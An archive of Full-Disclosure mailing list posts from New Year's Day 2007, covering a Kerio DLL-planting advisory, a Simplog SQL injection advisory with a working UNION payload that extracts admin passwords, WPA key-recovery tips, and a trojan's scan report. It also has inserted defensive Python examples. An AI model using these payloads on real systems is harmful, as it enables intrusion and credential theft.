Re: [Full-disclosure] [OOT] Thesis for master degree

2007-01-01 Thread andur matrix

Hi,

First make sure which topic you are interested in: attacking or defending. They
are of quite different philosophies. If you are into attacking by nature, you
cannot do very well in defending. You will find it boring.

andur.


On 12/18/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:


On Sat, 16 Dec 2006 17:55:50 GMT, Aaron Gray said:
>
> >- Disassembling Vista Security
>
> This is illegal. So not a very good idea for the thesis.

This of course is *very* dependent on what country you are in.

In the US, the most important law involved would probably be the DMCA,
which *does* have an exception for reverse engineering for compatibility
research (17 USC 1201(f)), encryption research (17 USC 1201(g)), and
security testing (17 USC 1201(j)).


http://www.law.cornell.edu/uscode/html/uscode17/usc_sec_17_1201000-.html

Note that 17 USC 1201(j)(2) *specifically* hints that you *really* want
an in-writing "Get Out Of Jail Free" card for 18 USC 1030 and related.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




[Full-disclosure] Gmail XSS?

2007-01-01 Thread Denzity

There are reports of a Gmail XSS in the wild that will steal someone's contact
list and email if the website is visited while logged in to Gmail.

http://cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/

I can't find this on Bugtraq or any release. Anyone have any more info or a
PoC?

Thanks, Denzity.

[Full-disclosure] Kerio Fake 'iphlpapi' DLL injection Vulnerability

2007-01-01 Thread Matousec - Transparent security Research
Hello,

We would like to inform you about a vulnerability in Sunbelt Kerio Personal
Firewall:

Description:

When Sunbelt Kerio Personal Firewall (SKPF) loads dependent modules, it relies
on the operating system. The system library iphlpapi.dll is located in the
system directory, but the main SKPF service, which requires and loads this DLL,
is located in the installation directory of SKPF. This is why it tries to find
iphlpapi.dll in its installation directory first and then, if it is not found
there, in the system directory. Moreover, it is possible to create new files in
the installation directory of SKPF. A malicious application can create a fake
iphlpapi.dll in the installation directory of SKPF, which will be loaded by the
operating system into the SKPF service during its initialization. This is how
the malicious application is able to execute arbitrary code inside the SKPF
service and bypass any of its security mechanisms.
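The following is an added example (not code from the advisory or from Matousec) that models the loader behaviour the advisory relies on, for auditing an installation rather than exploiting it. It simulates the classic Windows search order (application directory before the system directory) over constructed directory listings and reports which imported DLLs an unprivileged user could substitute; the KnownDLLs subset, paths and file names are constructed for the example, and the one real-world detail it encodes is that KnownDLLs bypass the search order, which is why a library like iphlpapi.dll (not on that list) is the interesting case.

```python
"""DLL search-order audit modelled on the SKPF iphlpapi.dll issue above.

Added example, not code from the advisory or from Matousec. Directory
paths, file names and the KnownDLLs subset are constructed.
"""
from dataclasses import dataclass, field


@dataclass
class Directory:
    path: str
    files: set = field(default_factory=set)   # lower-cased file names present
    writable_by_users: bool = False           # constructed summary of the ACL


# DLLs registered under KnownDLLs are mapped from the system directory
# regardless of the search order, so a copy in an app dir is ignored.
# Constructed subset; the real list lives in the registry.
KNOWN_DLLS = frozenset({"ntdll.dll", "kernel32.dll", "user32.dll",
                        "advapi32.dll", "ws2_32.dll"})


def resolve_dll(name, app_dir, system_dir, known_dlls=KNOWN_DLLS):
    """Return the directory path the loader would take `name` from, or None."""
    name = name.lower()
    if name in known_dlls:
        return system_dir.path if name in system_dir.files else None
    for directory in (app_dir, system_dir):      # app dir is searched first
        if name in directory.files:
            return directory.path
    return None


def audit_planted_dlls(app_dir, system_dir, imported_dlls, known_dlls=KNOWN_DLLS):
    """Classify each DLL the application's service imports.

    shadowed   - a copy already sits in the app dir ahead of the system one
    hijackable - resolves from the system dir today, but the app dir is
                 user-writable, so a dropped copy would be loaded instead
    ok         - resolves safely (KnownDLL, or the app dir is locked down)
    missing    - not found on the modelled search path
    """
    findings = {}
    for dll in imported_dlls:
        key = dll.lower()
        where = resolve_dll(key, app_dir, system_dir, known_dlls)
        if where is None:
            findings[key] = "missing"
        elif where == app_dir.path and key in system_dir.files:
            findings[key] = "shadowed"
        elif key not in known_dlls and app_dir.writable_by_users:
            findings[key] = "hijackable"
        else:
            findings[key] = "ok"
    return findings


# Constructed listings: an SKPF-style install dir that users can write to,
# and a system directory holding the real iphlpapi.dll.
SKPF_DIR = Directory(r"C:\Program Files\Sunbelt Software\Personal Firewall",
                     {"service.exe"}, writable_by_users=True)
SYSTEM_DIR = Directory(r"C:\Windows\System32",
                       {"iphlpapi.dll", "kernel32.dll", "ws2_32.dll"})
IMPORTS = ["iphlpapi.dll", "kernel32.dll", "nonexistent.dll"]


def audit_with_fixed_acl(app_dir, system_dir, imported_dlls):
    """Re-run the audit as if the install directory ACL had been tightened,
    the mitigation that removes the 'hijackable' finding."""
    locked = Directory(app_dir.path, set(app_dir.files), writable_by_users=False)
    return audit_planted_dlls(locked, system_dir, imported_dlls)


if __name__ == "__main__":
    for dll, verdict in audit_planted_dlls(SKPF_DIR, SYSTEM_DIR, IMPORTS).items():
        print(f"{dll:20} {verdict}")
    print("after locking down the install dir:",
          audit_with_fixed_acl(SKPF_DIR, SYSTEM_DIR, IMPORTS))
```

On a live machine the same two checks (is the directory writable by non-administrators, and does any system DLL the service imports already have a copy there) are what an auditor or an EDR file-integrity rule would look for; the service itself can also avoid the problem by loading such libraries by full path from the system directory.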


Vulnerable software:

 * Sunbelt Kerio Personal Firewall 4.3.268
 * Sunbelt Kerio Personal Firewall 4.3.246
 * probably all versions of Sunbelt Kerio Personal Firewall 4
 * possibly older versions of Sunbelt Kerio Personal Firewall



More details and a proof of concept including its source code are available 
here:
http://www.matousec.com/info/advisories/Kerio-Fake-iphlpapi-DLL-injection.php


Regards,


-- 
Matousec - Transparent security Research
http://www.matousec.com/



[Full-disclosure] Vista Reduced Function mode triggered

2007-01-01 Thread Geo.
The other day I used my router to limit my Vista laptop from talking to 
anything but one subnet on the internet. 3 days later suddenly some things 
would not work.

Solitaire failed to start, click on it and you get the magic donut showing 
it's starting up then nothing.

Right click on network and pick properties you get the magic donut showing 
it's starting up then nothing.

So I removed the routes so Vista could once again phone home and within a 
minute or two both solitaire and network properties worked just fine.

Now this Vista system is less than 30 days old and has already been 
activated. So the claims that Reduced Function mode only kicks in if you 
don't activate within 30 days are bunk if this is Reduced Function mode.

So I decided to trigger RF mode on purpose to see how it responds. I stopped 
the Software License service which claims that doing so will trigger RF 
mode. 24 hours later solitaire, network properties, and control panel all 
show the same behavior, the magic donut showing they are starting up then 
nothing. No events in event log, nothing.

I then started the Software License service and presto like magic these 
functions work again. So I'm convinced that the machine being routed so it 
can't talk to MS triggered RF mode within a few days. Now to me this seems 
pretty clear even though it wasn't a real scientific method of testing. And 
further, this looks to me like an accident waiting to happen. I mean imagine 
if MS fell off the planet we would have a pretty major problem as the bulk 
of the world's computers started shutting down, talk about a security issue?

So anyone here with a bit more technical expertise want to pick up this ball 
and run with it?

Geo. 



Re: [Full-disclosure] Authenticated users can sniff WPA traffic?

2007-01-01 Thread coderman
On 12/31/06, /dev/null <[EMAIL PROTECTED]> wrote:
> ...
> recently I came across this link:
> http://seclists.org/pen-test/2005/Nov/0073.html
>
> Basically, it states that authenticated users, in combination with ARP
> poisoning, can sniff WPA traffic. Can anybody confirm this is possible? If
> that's true, is there any way to prevent this?

of course it's true.  don't let ARP poisoning occur on your network.
most good wifi security tools / systems will check for this among the
other usual masquerading (rogue APs, injection with invalid
timestamps, etc).

note that a mandatory part of this attack is having auth credentials
for WPA-PSK or WPA-Enterprise (EAP/TLS,etc) so you can talk on the
network to mount this ARP poisoning attack.


> I would really appreciate any info/link/paper regarding topic.

any good IP routing text would be useful, particularly the interplay
between ethernet (and other L2 protocols) and IP via ARP/RARP.

as one last side note, if you've got the WPA-PSK secret via dictionary
attack you can combine this with disassociate injection to force all
clients to re-authenticate while you are listening so you can recover
the client keys (TKIP or CCMP) used for communication and get better
results since you no longer need the ARP hack which will be slower and
more brittle (you must remain in the loop) comparatively.
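As an added example (not code from the thread), here is the kind of check coderman's "don't let ARP poisoning occur on your network" refers to, written as a small monitor: it watches ARP traffic for an IP that suddenly answers from a different MAC, pins known-good bindings such as the gateway so they are never overwritten, and counts how many IPs one MAC claims. The frames fed in are constructed tuples standing in for parsed ARP packets; a real deployment would feed them from a capture.

```python
"""ARP spoof detector for a LAN/WLAN where every station already holds the
WPA credentials. Added example, not code from the thread; the sample
frames are constructed.
"""
from collections import defaultdict

ARP_REQUEST = 1
ARP_REPLY = 2


class ArpWatch:
    def __init__(self, pinned=None):
        # pinned: IP -> MAC bindings that must never change (gateway, DNS, ...)
        self.pinned = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
        self.bindings = dict(self.pinned)          # current IP -> MAC view
        self.claims = defaultdict(set)             # MAC -> IPs it has claimed
        self.alerts = []

    def observe(self, ts, sender_ip, sender_mac, opcode):
        """Feed one ARP frame; return an alert dict or None."""
        mac = sender_mac.lower()
        self.claims[mac].add(sender_ip)
        previous = self.bindings.get(sender_ip)
        if previous is None:
            self.bindings[sender_ip] = mac         # first sighting, learn it
            return None
        if previous == mac:
            return None
        alert = {
            "ts": ts,
            "ip": sender_ip,
            "old_mac": previous,
            "new_mac": mac,
            "opcode": "reply" if opcode == ARP_REPLY else "request",
            # a pinned host changing MAC is the classic gateway-poison pattern
            "severity": "critical" if sender_ip in self.pinned else "warning",
        }
        self.alerts.append(alert)
        if sender_ip not in self.pinned:
            self.bindings[sender_ip] = mac         # ordinary hosts may move
        return alert

    def greedy_macs(self, threshold=2):
        """MACs that have claimed more IPs than a single host plausibly owns."""
        return {m: sorted(ips) for m, ips in self.claims.items()
                if len(ips) > threshold}


# Constructed capture: gateway is .1, victim is .20, and the station at .21
# starts answering ARP for both of them from t=2.0 on.
SAMPLE_FRAMES = [
    (0.0, "192.168.1.1",  "00:11:22:33:44:55", ARP_REPLY),
    (0.5, "192.168.1.20", "aa:bb:cc:dd:ee:01", ARP_REQUEST),
    (1.0, "192.168.1.21", "aa:bb:cc:dd:ee:02", ARP_REPLY),
    (2.0, "192.168.1.1",  "aa:bb:cc:dd:ee:02", ARP_REPLY),
    (2.1, "192.168.1.20", "aa:bb:cc:dd:ee:02", ARP_REPLY),
    (2.2, "192.168.1.20", "aa:bb:cc:dd:ee:02", ARP_REPLY),
]
GATEWAY = {"192.168.1.1": "00:11:22:33:44:55"}


def run(frames=SAMPLE_FRAMES, pinned=GATEWAY):
    """Replay a frame list through the monitor and return it for inspection."""
    watch = ArpWatch(pinned)
    for frame in frames:
        watch.observe(*frame)
    return watch


if __name__ == "__main__":
    w = run()
    for a in w.alerts:
        print(f"[{a['severity']}] t={a['ts']} {a['ip']}: "
              f"{a['old_mac']} -> {a['new_mac']} ({a['opcode']})")
    print("MACs claiming several IPs:", w.greedy_macs())
```

Pinning the gateway is the important design choice: a binding table that simply trusts the latest reply is exactly what the attack abuses, so the monitor alerts on the change but keeps the known-good MAC for pinned hosts. On the switch or AP side the equivalent control is dynamic ARP inspection or client isolation, which stops the forged replies from reaching other stations at all.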



[Full-disclosure] simplog 0.9.3.2 SQL injection

2007-01-01 Thread Javor Ninov
Affected Software:
simplog up to 0.9.3.2 (latest version - 12/05/2006 )

Site:
http://www.simplog.org
Simplog provides an easy way for users to add blogging capabilities to
their existing websites. Simplog is written in PHP and compatible with
multiple databases. Simplog also features an RSS/Atom aggregator/reader.
Powerful, yet simple

Vulnerability:
SQL Injection in archive.php
other files probably also affected

Example:
http://example.com/simplog/archive.php?blogid=1&pid=%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1

Vendor status:
NOT NOTIFIED


Javor Ninov aka DrFrancky
drfrancky shift+2 securax.org
http://securitydot.net/
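As an added example (not Simplog's code and not Javor's PoC), here is the vulnerable pattern behind an advisory like this one beside its fix. The schema and the query are constructed to mirror the shape of the report: an integer pid parameter pasted straight into the SQL string lets a UNION pull rows out of the users table, while the fixed version type-checks the parameter and binds it with placeholders. SQLite stands in for the database backends Simplog supports.

```python
"""Vulnerable archive lookup beside its parameterised fix.

Added example, not Simplog's code nor the advisory's PoC. Schema, rows,
query and payload are constructed.
"""
import sqlite3


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE blog_entries (id INTEGER, blogid INTEGER, title TEXT);
        CREATE TABLE blog_users  (login TEXT, password TEXT, admin INTEGER);
        INSERT INTO blog_entries VALUES (1, 1, 'hello world');
        INSERT INTO blog_entries VALUES (2, 1, 'second post');
        INSERT INTO blog_users  VALUES ('admin', 'hunter2', 1);   -- constructed
        INSERT INTO blog_users  VALUES ('bob',   'letmein', 0);
    """)
    return conn


def archive_vulnerable(conn, blogid, pid):
    """Pattern behind the advisory: request parameters interpolated into SQL."""
    sql = (f"SELECT id, blogid, title FROM blog_entries "
           f"WHERE blogid = {blogid} AND id = {pid}")
    return conn.execute(sql).fetchall()


def archive_fixed(conn, blogid, pid):
    """Fix: validate the type, then bind with placeholders, never string-build."""
    try:
        blogid, pid = int(blogid), int(pid)
    except (TypeError, ValueError):
        raise ValueError("blogid and pid must be integers")
    return conn.execute(
        "SELECT id, blogid, title FROM blog_entries WHERE blogid = ? AND id = ?",
        (blogid, pid),
    ).fetchall()


# Same pattern as the advisory's URL, adapted to the 3-column constructed query.
UNION_PAYLOAD = "0 union select 1, login, password from blog_users where admin=1"


def demo():
    """Return (rows the vulnerable query leaks, whether the fix rejected the
    payload, rows the fixed query returns for a legitimate request)."""
    conn = build_db()
    leaked = archive_vulnerable(conn, "1", UNION_PAYLOAD)
    try:
        archive_fixed(conn, "1", UNION_PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked, archive_fixed(conn, "1", "1")


if __name__ == "__main__":
    leaked, blocked, legit = demo()
    print("vulnerable query returned:", leaked)
    print("fixed query rejected payload:", blocked)
    print("fixed query, legitimate request:", legit)
```

The type check matters as much as the placeholder: with pid cast to int, a UNION cannot even reach the database, and the parameterised statement covers the string-typed parameters (such as a month or year filter) where a cast is not available.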




Re: [Full-disclosure] Vista Reduced Function mode triggered

2007-01-01 Thread php0t

  Didn't have the chance / interest to meet Vista myself as of yet, but
if what you wrote isn't user error or something specific and limited to
only a few computers then excuse me a moment while i lmao. BTW, is there
anything in vista's agreement in legalish that could be translated into
'you agree that you feed your software internet' ? Maybe micro$ says
that this is needed to verify that you're running a legal OS every now
and then, so $uck it ? :-) Sorry for not having ideas just raising more
questions, hope somebody replies in a few pointing out the obvious.



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Geo.
Sent: Monday, January 01, 2007 8:27 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Vista Reduced Function mode triggered


The other day I used my router to limit my Vista laptop from talking to 
anything but one subnet on the internet. 3 days later suddenly some
things 
would not work.

Solitaire failed to start, click on it and you get the magic donut
showing 
it's starting up then nothing.

Right click on network and pick properties you get the magic donut
showing 
it's starting up then nothing.

So I removed the routes so Vista could once again phone home and within
a 
minute or two both solitaire and network properties worked just fine.

Now this Vista system is less than 30 days old and has already been 
activated. So the claims that Reduced Function mode only kicks in if you
don't activate within 30 days are bunk if this is Reduced Function mode.

So I decided to trigger RF mode on purpose to see how it responds. I
stopped 
the Software License service which claims that doing so will trigger RF 
mode. 24 hours later solitaire, network properties, and control panel
all 
show the same behavior, the magic donut showing they are starting up
then 
nothing. No events in event log, nothing.

I then started the Software License service and presto like magic these 
functions work again. So I'm convinced that the machine being routed so
it 
can't talk to MS triggered RF mode within a few days. Now to me this
seems 
pretty clear even though it wasn't a real scientific method of testing.
And 
further, this looks to me like an accident waiting to happen. I mean
imagine 
if MS fell off the planet we would have a pretty major problem as the
bulk 
of the world's computers started shutting down, talk about a security
issue?

So anyone here with a bit more technical expertise want to pick up this
ball 
and run with it?

Geo. 







[Full-disclosure] Jeff Bernstein

2007-01-01 Thread Simon Smith
It has come to my attention that Jeff Bernstein has been falsely using the
names of SNOsoft Research Team members. Moreover, Jeff Bernstein has been
falsely associating himself with the SNOsoft/HP/DMCA vulnerability research
and development ordeal that happened earlier in 2001.

Jeff Bernstein has never been affiliated with the SNOsoft Research Team nor
will he ever be. Jeff Bernstein does not work with nor has he ever directly
worked with any of the SNOsoft Team Members.

If anyone has talked with, or speaks with Jeff Bernstein in the future and
if Mr. Bernstein mentions SNOsoft, please contact me immediately at
[EMAIL PROTECTED]

Thank you.

Regards, 
Simon Smith
SNOsoft Research Team
http://www.snosoft.com
   




Re: [Full-disclosure] Gmail XSS?

2007-01-01 Thread Juha-Matti Laurio
According to this news it was fixed already:
http://blogs.zdnet.com/Google/?p=434

See a quote of Google Security Team

- Juha-Matti


Denzity <[EMAIL PROTECTED]> wrote: 
>
> There are reports of a Gmail XSS in the wild that will steal someone's contact
> list and email if the website is visited while logged in to Gmail.
> 
> http://cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/
> 
> I can't find this on Bugtraq or any release. Anyone have any more info or
> a PoC?
>
> Thanks, Denzity.



Re: [Full-disclosure] Vista Reduced Function mode triggered

2007-01-01 Thread Geo.

> anything in vista's agreement in legalish that could be translated into
> 'you agree that you feed your software internet' ?

http://www.microsoft.com/windowsvista/getready/systemrequirements.mspx

Yep, specifies "internet" under requirements. Should specify unrestricted 
internet access if you ask me.

Geo. 



Re: [Full-disclosure] Vista Reduced Function mode triggered

2007-01-01 Thread Poof
The issues that the original poster is having don't sound anything like
normal behavior. One of the scenarios expected in Vista would be a Laptop
that's been activated being used in a restricted internet work zone. And if
that laptop has been activated normally (The 1-time activation as provided
with the Windows install.) it shouldn't go to reduced mode. Further, it'll
give a 30 day warning prior to going to reduced mode if it's suddenly
deactivated asking for it to be reactivated. (Say a hardware change/etc.)

In short, I am unable to repro this. I'm currently running Vista on two
systems; the other system is in a sandbox. (However, was "open" during the
activation process.)

Erm, from what I can see from the requirements, Internet is not required as
it's in the same format as Audio.

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Geo.
Sent: Monday, January 01, 2007 3:35 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Vista Reduced Function mode triggered


> anything in vista's agreement in legalish that could be translated into
> 'you agree that you feed your software internet' ?

http://www.microsoft.com/windowsvista/getready/systemrequirements.mspx

Yep, specifies "internet" under requirements. Should specify unrestricted 
internet access if you ask me.

Geo. 



[Full-disclosure] Security contact at TrendMicro

2007-01-01 Thread Sebastian Wolfgarten
Hi,

does anyone know a security contact at TrendMicro? I was unable to find one 
on their website and tried both [EMAIL PROTECTED] as well as 
[EMAIL PROTECTED] but they bounced back. Anyone?

Thanks. Ah yeah, Happy New Year everyone!

Best regards,
Sebastian Wolfgarten



[Full-disclosure] Welcome to Pwndertino...

2007-01-01 Thread K F (lists)
Just in case you are drunk / hungover / out of town or whatever... this is a 
friendly reminder that MOAB has begun. 

http://projects.info-pull.com/moab/index.html

-KF 




Re: [Full-disclosure] Simcard 0day.

2007-01-01 Thread Blue Boar
dfklsddshd wrote:
> 1. Open attachment.

Does this actually work on people on a security mailing list?

BB

Complete scanning result of "Simcard.com", received in VirusTotal at
01.02.2007, 02:38:58 (CET).

Antivirus           Version          Update      Result
AntiVir             7.3.0.21         01.01.2007  TR/Spy.Banker.73216
Authentium          4.93.8           12.30.2006  no virus found
Avast               4.7.892.0        12.30.2006  no virus found
AVG                 386              01.01.2007  no virus found
BitDefender         7.2              01.01.2007  GenPack:Generic.Banker.OT.924A93D1
CAT-QuickHeal       8.00             01.01.2007  (Suspicious) - DNAScan
ClamAV              devel-20060426   01.01.2007  no virus found
DrWeb               4.33             12.31.2006  WIN.MAIL.WORM.Virus
eSafe               7.0.14.0         01.01.2007  Suspicious Trojan/Worm
eTrust-InoculateIT  23.73.102        12.30.2006  no virus found
eTrust-Vet          30.3.3289        12.29.2006  no virus found
Ewido               4.0              01.01.2007  no virus found
Fortinet            2.82.0.0         01.01.2007  suspicious
F-Prot              3.16f            12.30.2006  no virus found
F-Prot4             4.2.1.29         12.30.2006  no virus found
Ikarus              T3.1.0.27        01.01.2007  Trojan-Spy.Win32.Banker.axc
Kaspersky           4.0.2.24         01.02.2007  no virus found
McAfee              4929             12.29.2006  no virus found
Microsoft           1.1904           12.31.2006  no virus found
NOD32v2             1951             01.01.2007  probably unknown NewHeur_PE virus
Norman              5.80.02          12.31.2007  no virus found
Panda               9.0.0.4          01.01.2007  Suspicious file
Prevx1              V2               01.02.2007  no virus found
Sophos              4.13.0           01.01.2007  no virus found
Sunbelt             2.2.907.0        12.18.2006  VIPRE.Suspicious
TheHacker           6.0.3.141        01.01.2007  no virus found
VBA32               3.11.1           01.01.2007  no virus found
VirusBuster         4.3.19:9         01.01.2007  no virus found

Aditional Information
File size: 73216 bytes
MD5: 5f22c38e77383a68f865a2c8d9c84f0c
SHA1: c1a76dc5fa43d102b447057ce16ad44e8dcf456f
packers: YODA
packers: YodaProt
Sunbelt info: VIPRE.Suspicious is a generic detection for potential
threats that are deemed suspicious through heuristics.
VirusTotal is a free service offered by Hispasec Sistemas. There are no
guarantees about the availability and continuity of this service.
Although the detection rate afforded by the use of multiple antivirus
engines is far superior to that offered by just one product, these
results DO NOT guarantee the harmlessness of a file. Currently, there is
not any solution that offers a 100% effectiveness rate for detecting
viruses and malware.



Re: [Full-disclosure] Vista Reduced Function mode triggered

2007-01-01 Thread Jay Sulzberger


On Mon, 1 Jan 2007, Poof <[EMAIL PROTECTED]> wrote:

> The issues that the original poster is having don't sound anything like
> normal behavior. One of the scenarios expected in Vista would be a Laptop
> that's been activated being used in a restricted internet work zone. And if
> that laptop has been activated normally (The 1-time activation as provided
> with the Windows install.) it shouldn't go to reduced mode. Further, it'll
> give a 30 day warning prior to going to reduced mode if it's suddenly
> deactivated asking for it to be reactivated. (Say a hardware change/etc.)
>
> In short, I am unable to repro this. I'm currently running Vista on two
> systems; the other system is in a sandbox. (However, was "open" during the
> activation process.)
>
> Erm, from what I can see from the requirements, Internet is not required as
> it's in the same format as Audio.

The issue is not: how Microsoft treats those whose boxes Microsoft has
Trojaned.

The issue is: Microsoft should not be root on my computer.

And no EULA can take away root from me and grant root to
Microsoft on any computer I own.

oo--JS.


>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of Geo.
> Sent: Monday, January 01, 2007 3:35 PM
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Vista Reduced Function mode triggered
>
>
>> anything in vista's agreement in legalish that could be translated into
>> 'you agree that you feed your software internet' ?
>
> http://www.microsoft.com/windowsvista/getready/systemrequirements.mspx
>
> Yep, specifies "internet" under requirements. Should specify unrestricted
> internet access if you ask me.
>
> Geo.
>


[Full-disclosure] (no subject)

2007-01-01 Thread Moore, Robert
Simon Smith of the SNOsoft Research Team provides the url
 >
but when you go there, you get:

The SNOsoft Research Team has been acquired by Netragard, L.L.C. 
  
http://www.netragard.com  

um, did someone forget to tell Mr. Smith ??
 
;-)
 
bob moore
---
Date: Mon, 01 Jan 2007 18:16:59 -0500
From: Simon Smith <[EMAIL PROTECTED]>
Subject: [Full-disclosure] Jeff Bernstein

It has come to my attention that Jeff Bernstein has been falsely using the
names of SNOsoft Research Team members. Moreover, Jeff Bernstein has been
falsely associating himself with the SNOsoft/HP/DMCA vulnerability research
and development ordeal that happened earlier in 2001.

Jeff Bernstein has never been affiliated with the SNOsoft Research Team nor
will he ever be. Jeff Bernstein does not work with nor has he ever directly
worked with any of the SNOsoft Team Members.

If anyone has talked with, or speaks with Jeff Bernstein in the future and
if Mr. Bernstein mentions SNOsoft, please contact me immediately at
[EMAIL PROTECTED]

Thank you.

Regards,
Simon Smith
SNOsoft Research Team
http://www.snosoft.com 
 



Re: [Full-disclosure] simplog 0.9.3.2 SQL injection

2007-01-01 Thread str0ke
Javor,

It seems rgod found this vulnerability back in April of 2006.

http://www.milw0rm.com/exploits/1663

<>
  ii)
  http://[target]/[path]/index.php?blogid=[sql]
  http://[target]/[path]/archive.php?blogid=[sql]
  http://[target]/[path]/archive.php?m=[sql]
  http://[target]/[path]/archive.php?y=[sql]

/str0ke

On 1/1/07, Javor Ninov <[EMAIL PROTECTED]> wrote:
> Affected Software:
> simplog up to 0.9.3.2 (latest version - 12/05/2006 )
>
> Site:
> http://www.simplog.org
> Simplog provides an easy way for users to add blogging capabilities to
> their existing websites. Simplog is written in PHP and compatible with
> multiple databases. Simplog also features an RSS/Atom aggregator/reader.
> Powerful, yet simple
>
> Vulnerability:
> SQL Injection in archive.php
> other files probably also affected
>
> Example:
> http://example.com/simplog/archive.php?blogid=1&pid=%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1
>
> Vendor status:
> NOT NOTIFIED
>
>
> Javor Ninov aka DrFrancky
> drfrancky shift+2 securax.org
> http://securitydot.net/
>
>
>


Re: [Full-disclosure] (no subject)

2007-01-01 Thread Simon Smith
Very observant of you Bob, the SNOsoft site is not active right now. We hope
to reactivate it later on in 2007. Any more questions? :]

On 1/1/07 10:07 PM, "Moore, Robert" <[EMAIL PROTECTED]> wrote:

> Simon Smith of the SNOsoft Research Team provides the url
>  >
> but when you go there, you get:
> 
> The SNOsoft Research Team has been acquired by Netragard, L.L.C.
> 
> http://www.netragard.com 
> 
> um, did someone forget to tell Mr. Smith ??
>  
> ;-)
>  
> bob moore
> --
> -
> Date: Mon, 01 Jan 2007 18:16:59 -0500
> From: Simon Smith <[EMAIL PROTECTED]>
> Subject: [Full-disclosure] Jeff Bernstein
> 
> It has come to my attention that Jeff Bernstein has been falsely using the
> names of SNOsoft Research Team members. Moreover, Jeff Bernstein has been
> falsely associating himself with the SNOsoft/HP/DMCA vulnerability research
> and development ordeal that happened earlier in 2001.
> 
> Jeff Bernstein has never been affiliated with the SNOsoft Research Team nor
> will he ever be. Jeff Bernstein does not work with nor has he ever directly
> worked with any of the SNOsoft Team Members.
> 
> If anyone has talked with, or speaks with Jeff Bernstein in the future and
> if Mr. Bernstein mentions SNOsoft, please contact me immediately at
> [EMAIL PROTECTED]
> 
> Thank you.
> 
> Regards,
> Simon Smith
> SNOsoft Research Team
> http://www.snosoft.com
> 
> 


Re: [Full-disclosure] Vista Reduced Function mode triggered

2007-01-01 Thread Geo.
> In the short, I am unable to repro this. I'm currently running Vista on
> two
> systems; the other system is in a sandbox. (However, was "open" during the
> activation process.)

One thing you might try is instead of cutting it off entirely from the
internet, use an external device to limit what internet addresses it can
talk to so that it has a valid and working gateway but it can't phone home.

Also, it didn't happen immediately, I implemented the routing and then it 
was 3 days before I noticed things weren't working (may have been less but I 
just didn't notice till then), tried rebooting to cure the problems, poked 
around at other things, nothing helped. Then upon removing the routing and 
letting it talk to the whole net it was only minutes before everything was 
working again.

Geo.



Re: [Full-disclosure] Vista Reduced Function mode triggered

2007-01-01 Thread php0t

> One thing you might try is instead of cutting it off entirely from the
> internet, use an external device to limit what internet
> addresses it can talk to so that it has a valid and working gateway
> but it can't phone home.

I doubt Vista wants to google for porn instead of phoning home.

After reading the other posts, I think the question is still there, if
you cut a vista's internet access after it's been activated, does it go
to reduced mode because of not being able to phone home? Anybody with
certain results on this?









Re: [Full-disclosure] Vista Reduced Function mode triggered

2007-01-01 Thread Larry Seltzer
>> if you cut a vista's internet access after it's been activated, does
>> it go to reduced mode because of not being able to phone home?

It just can't be that simple. There has to be more to what happened to
the guy. Lots of computers are offline for several days at a time, it's
inconceivable that they didn't test that.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 



Re: [Full-disclosure] Vista Reduced Function mode triggered

2007-01-01 Thread php0t
> It just can't be that simple. There has to be more to what happened to
> the guy. Lots of computers are offline for several
> days at a time, it's inconceivable that they didn't test that.

Yeah, probably - but just for the fun of it I'm curious what happened
(unless it's some dumb user error).








Re: [Full-disclosure] Vista Reduced Function mode triggered

2007-01-01 Thread Geo.

> It just can't be that simple. There has to be more to what happened to
> the guy. Lots of computers are offline for several days at a time, it's
> inconceivable that they didn't test that.

Ok, as complete as I can be in the few minutes I have to post this.

During those three days I did a lot of poking around, stopping and starting 
services, switching from wired to wireless and back, trying to view high def 
video (which I still am not able to do in any video player except WMP for 
some reason) installing codecs and software, running into the event ID 4226 
tcp security connect limit, etc.

However I never got any notification of deactivation or any problem of that 
sort. Then on the third day suddenly solitaire would not start up and I 
couldn't get into network properties. I did a bunch of rebooting and 
troubleshooting trying to figure that out but got nowhere.

So I went back to trying to get high def video to work in Media player 
classic and figured perhaps it was trying to download a codec so I removed 
the routes. It didn't help the video but I quickly found network properties 
started working. So then I tried solitaire and it worked. This was all 
directly after removing the routes, there wasn't but a few minutes between 
letting it talk to the net and these apps starting to work again.

I decided this was probably reduced functionality in action but since I had 
never seen it before I needed some way to trigger it so I could compare 
since it would take 3 days to reproduce with route blocking. I disabled the 
software licensing service since it claims disabling that service will kick 
off reduced functionality mode. Nothing happened immediately but 24 hours 
later solitaire and network properties (and now control panel) would not 
start up. It was exactly the same apps and behavior. I enabled and started 
the software licensing service and in seconds things returned to fully 
functional just like removing the routes did.

So it's possible the routes didn't trigger it, but removing them sure cured 
it quickly so that is my guess at this point. Further testing is needed. I 
won't be testing it for a couple days as I need the laptop connected to 
other networks to try some other software I need to test. (that tcp limit 
may prove a problem for network monitoring)

Geo. 



Re: [Full-disclosure] Simcard 0day.

2007-01-01 Thread Randal T. Rioux
Blue Boar wrote:
> dfklsddshd wrote:
>> 1. Open attachment.
> 
> Does this actually work on people on a security mailing list?
> 
>   BB
> 
> Complete scanning result of "Simcard.com", received in VirusTotal at
> 01.02.2007, 02:38:58 (CET).
>  

You would be quite surprised, I'm sure.

randy



Re: [Full-disclosure] Vista Reduced Function mode triggered

2007-01-01 Thread Jason Miller

